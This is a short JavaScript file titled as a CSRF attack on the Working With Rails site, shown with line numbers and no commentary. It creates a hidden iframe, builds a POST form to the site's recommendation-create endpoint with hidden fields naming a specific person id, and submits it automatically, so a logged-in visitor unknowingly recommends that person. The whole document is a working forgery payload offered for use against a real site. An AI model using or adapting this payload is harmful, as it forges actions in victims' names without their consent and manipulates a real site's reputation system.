1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67

// CSRF for Working With Rails

function IFrame(parentElement)  
{  
   // Create the iframe which will be returned  
   var iframe = document.createElement("iframe");  
  
   // If no parent element is specified then use body as the parent element  
   if(parentElement == null)  
      parentElement = document.body;  
  
   // This is necessary in order to initialize the document inside the iframe  
   parentElement.appendChild(iframe);  
  
   // Initiate the iframe's document to null  
   iframe.doc = null;  
  
   // Depending on browser platform get the iframe's document, this is only  
   // available if the iframe has already been appended to an element which  
   // has been added to the document  
   if(iframe.contentDocument)  
      // Firefox, Opera  
      iframe.doc = iframe.contentDocument;  
   else if(iframe.contentWindow)  
      // Internet Explorer  
      iframe.doc = iframe.contentWindow.document;  
   else if(iframe.document)  
      // Others?  
      iframe.doc = iframe.document;  
  
   // If we did not succeed in finding the document then throw an exception  
   if(iframe.doc == null)  
      throw "Document not found, append the parent element to the DOM before creating the IFrame";  
  
   // Create the script inside the iframe's document which will call the  
   iframe.doc.open();  
   iframe.doc.close();  
  
   // Return the iframe, now with an extra property iframe.doc containing the  
   // iframe's document  
   return iframe;  
}

var iframe = IFrame(document.body)
var doc = iframe.doc

var form = doc.createElement('form');
form.setAttribute('action', 'http://workingwithrails.com/recommendation/create');
form.setAttribute('method', 'post');
doc.body.appendChild(form);
var input1 = doc.createElement('input');
input1.setAttribute('type', 'hidden');
input1.setAttribute('name', 'recommendation[for_person_id]');
input1.setAttribute('value', '13081')
var input2 = doc.createElement('input');
input2.setAttribute('type', 'hidden');
input2.setAttribute('name', 'recommendation[have_read_blog]');
input2.setAttribute('value', '1')
var input3 = doc.createElement('input');
input3.setAttribute('type', 'hidden');
input3.setAttribute('name', 'recommendation[have_used_code_they_have_written]');
input3.setAttribute('value', '1')
form.appendChild(input1);
form.appendChild(input2);
form.appendChild(input3);

form.submit()